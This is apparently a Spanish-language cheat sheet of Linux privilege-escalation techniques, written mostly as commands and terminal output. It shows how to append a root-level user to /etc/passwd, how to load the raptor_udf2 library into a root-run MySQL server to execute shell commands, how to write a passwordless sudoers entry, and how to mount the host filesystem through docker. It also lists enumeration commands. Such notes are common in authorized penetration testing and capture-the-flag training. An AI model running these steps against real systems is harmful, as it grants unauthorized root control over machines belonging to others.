Linux Privilege Escalation

Agregar usuario con privilegios de root al passwd

openssl passwd -1 -salt gerh pass123
// El resultado del comando previo es un hash: $1$gerh$.X4NnMSmCMib61zDEDWTn0

Luego se concatena el nombre del usuario antes del hash spartan: y se finaliza con :0:0:root:/root:/bin/bash
spartan:$1$gerh$.X4NnMSmCMib61zDEDWTn0:0:0:root:/root:/bin/bash

su spartan
pass123

Pagina referente al tema de SUID

Se recomienda buscar writeups sobre el binario en cuestión:

GTFOBins

Detectar el OS de linux

cat /etc/*-release
cat /etc/issue

Encontrar directorios en donde puedes alojar informacion

find . -writable

Tecnica utilizando mysql que corre como root

lordoftheroot

[j0hn@timeclock ~]$ gcc -g -c raptor_udf2.c 
[j0hn@timeclock ~]$ gcc -g -shared -o raptor_udf2.so raptor_udf2.o -lc
[j0hn@timeclock ~]$ ls -la /home/j0hn/raptor_udf2.*
-rw-rw-r-- 1 j0hn j0hn 3314 Feb  7 22:08 /home/j0hn/raptor_udf2.c
-rw-rw-r-- 1 j0hn j0hn 3144 Feb  7 22:08 /home/j0hn/raptor_udf2.o
-rwxrwxr-x 1 j0hn j0hn 6029 Feb  7 22:08 /home/j0hn/raptor_udf2.so


mysql> use mysql;
mysql> create table foo(line blob);
Query OK, 0 rows affected (0.03 sec)

mysql> insert into foo values(load_file('/home/j0hn/raptor_udf2.so'));
Query OK, 1 row affected (0.00 sec)

mysql> select * from foo into dumpfile '/usr/lib/raptor_udf2.so';
Query OK, 1 row affected (0.00 sec)

mysql> create function do_system returns integer soname 'raptor_udf2.so';
Query OK, 0 rows affected, 1 warning (0.00 sec)
mysql> select * from mysql.func;
+-----------+-----+----------------+----------+
| name      | ret | dl             | type     |
+-----------+-----+----------------+----------+
| do_system |   2 | raptor_udf2.so | function | 
+-----------+-----+----------------+----------+
1 row in set (0.00 sec)

mysql> select do_system('id > /tmp/out;');
+-----------------------------+
| do_system('id > /tmp/out;') |
+-----------------------------+
|                  4294967296 | 
+-----------------------------+
1 row in set (0.00 sec)

mysql> select do_system('id > /tmp/out; chmod 777 /tmp/out');
+------------------------------------------------+
| do_system('id > /tmp/out; chmod 777 /tmp/out') |
+------------------------------------------------+
|                                     4294967296 | 
+------------------------------------------------+
1 row in set (0.00 sec)

mysql> exit

### Escalacion final por medio de /etc/sudoers

[j0hn@timeclock ~]$ mysql -u root 
mysql> select do_system('echo "j0hn ALL =(ALL) NOPASSWD: ALL">> /etc/sudoers');
+------------------------------------------------------------------+
| do_system('echo "j0hn ALL =(ALL) NOPASSWD: ALL">> /etc/sudoers') |
+------------------------------------------------------------------+
|                                                       4294967296 | 
+------------------------------------------------------------------+
1 row in set (0.00 sec)

mysql> exit
Bye
[j0hn@timeclock ~]$ sudo bash
[root@timeclock ~]# cd /root
[root@timeclock root]# ls -la

Escalacion VIA DOCKER

docker images ## Obtener el valor de alpine
docker run -it -v /:/mnt alpine chroot /mnt bash

Validacion de tareas CRON

Crontab.guru - The cron schedule expression editor

CAP

getcap -r / 2>/dev/null